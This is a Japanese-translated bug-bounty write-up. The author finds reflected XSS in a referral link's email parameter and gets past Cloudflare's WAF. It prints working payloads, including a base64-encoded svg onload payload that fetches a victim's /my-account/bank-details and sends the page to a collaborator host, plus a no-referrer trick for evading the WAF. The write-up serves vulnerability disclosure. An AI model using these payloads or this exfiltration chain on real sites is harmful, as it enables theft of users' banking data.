ソース:
訳:
かなりの期間にわたってプライベート プログラムを探していたときに、気になる紹介機能を見つけ。
この機能により、ユーザーの電子メールと紹介コードの両方を組み込んだ紹介リンクを生成できるようになりました。
これらのパラメータを URL 経由で渡すことに内在する潜在的な脆弱性に興味をそそられた私は、XSS (クロスサイト スクリプティング) 攻撃の可能性を調査することに。
私の最初の試み、ペイロードの注入:
“><img src=1 onerror=alert()>
すぐに Cloudflare ブロックに遭遇し。
私はひるむことなく、Cloudflare バイパス技術を利用して代替ペイロードをデプロイ。
“><img only src=1 onerror=alert()>
今度は成功。XSS エクスプロイトを示すポップアップがトリガーされます。
この進歩に勇気づけられて、私は機密データ、特に認証 Cookie を抜き出すことを試みて、脆弱性の影響を拡大しようとしました。
しかし、私の努力は Cookie の「httponly」スコープによって妨げられ、JavaScript からアクセスできなくなりました。
発見された脆弱性を報告すると、プログラム マネージャーは当然のことながら、その潜在的な影響を実証する概念実証 (POC) を要求し。
/my-account/bank-details から銀行詳細などの機密データを取得するために「eval」メソッドを採用する試みを含む徹底的な調査にもかかわらず、「eval」メソッドの実行をブロックする Web アプリケーション ファイアウォール (WAF) によって私の試みは妨げられ。
本質的に、私は XSS 脆弱性の特定と実証に成功しましたが、WAF によって課された制限により、その可能性を最大限に活用することが妨げられました。
その後、Web アプリケーション ファイアウォール (WAF) による制限を回避できるペイロードを見つけるために Twitter 経由で支援を求めました。
これにより、/my-account/bank-details エンドポイントから詳細を抽出して、協力者に応答を送信できるようになりました。
ありがたいことに、xnl-h4ck3r (https://x.com/xnl_h4ck3r?t=KOhaPurgLxxGX5rO2l9fGA&s=09) が快く専門知識を提供し、テスト用のペイロードを提供してくれ。
xnl-h4ck3r によって共有されるペイロードは次のとおりで。
<svg/ONxss='0'/ONload=location=window[`atob`]`amF2YXNjcmlwdDphbGVydCgxKQ==`;
ペイロード内のbase64値をデコードすると、javascript:alertに解決され。
成功の見通しに興奮してペイロードを実装したところ、予想通り、警告ポップアップが表示され。
このブレークスルーにより、新たな悪用の可能性が開かれ。
ペイロードと JavaScript 関数を実行する機能を備えたので、 fetch
ペイロードを使用して XSS の悪用を調整する関数:
javascript:fetch('https://example.com/my-account/bank-details').then(response => response.text()).then(data => fetch(`https://burp-collab) .com?data=${encodeURIComponent(data)}`));
ペイロード値を Base64 でエンコードし、最初に実装するという体系的なアプローチを採用し。
この方法は良い結果をもたらし、被害者ユーザーの銀行詳細を含むピンバックを共同制作者に受信し始め。
ただし、その後の試行では Cloudflare ブロックに遭遇したため、高揚感は長くは続かず。
私はペイロード全体のデコードと URL エンコードを試みました。
私の努力にも関わらず、問題は解決せず、根本原因を特定するためにデバッグを掘り下げるのに多大な時間とリソースを費やしました。
広範な調査の結果、画期的な発見が見つかりました。ユーザーがペイロードを含む URL (例: https://example.com/v1/api/refferral?email=LARGE-URL-ENCODED-PAYLOAD ) に移動すると、フェッチ要求は正常に実行されましたが、Web アプリケーション ファイアウォール (WAF) によってブロックされました。
当初は CORS エラーと間違われましたが、ユーザーが URL に移動した際にペイロード自体がリファラー ヘッダー内に存在したため、WAF がリクエストを傍受していることが明らかになりました。
この課題に対処するために、私は緩和戦略を考案しました。
ReferrerPolicy を「no-referrer」に設定した JavaScript フェッチ関数 (例: javascript:fetch("https://example.com/xxxxxxx ", {referrerPolicy: "no-referrer"})) を利用することで、正常にバイパスできました。 WAFの封鎖。
このソリューションを完全なペイロードに組み込むと、次のようになります。
もう一度完全なペイロードを作成してみましょう。
javascript:fetch('https://example.com/my-account/bank-details', {referrerPolicy: 'no-referrer'}).then(response => response.text()).then(data => fetch(`https://burp-collab.com?data=${encodeURIComponent(data)}`));
このペイロードをbase64でエンコードして電子メールパラメータに埋め込むことで、Cloudflare WAFを効果的に回避して銀行詳細を見事に漏洩するという望ましい結果を達成し。
したがって、このセキュリティ上の課題を克服する上で重要なマイルストーンとなります。
<svg/ONxss='0'/ONload=location=window[`atob`]`amF2YXNjcmlwdDpmZXRjaCgnaHR0cHM6Ly9leGFtcGxlLmNvbS9teS1hY2NvdW50L2JhbmstZGV0YWlscycpLnRoZW4ocmVzcG9uc2UgPT4gcmVzcG 9uc2UudGV4dCgpKS50aGVuKGRhd GEgPT4gZmV0Y2goYGh0dHBzOi8vYnVycC1jb2xsYWIuY29tP2RhdGE9JHtlbmNvZGVVUklDb21wb25lbnQoZGF0YSl9YCkpOw==`;
ほなほな。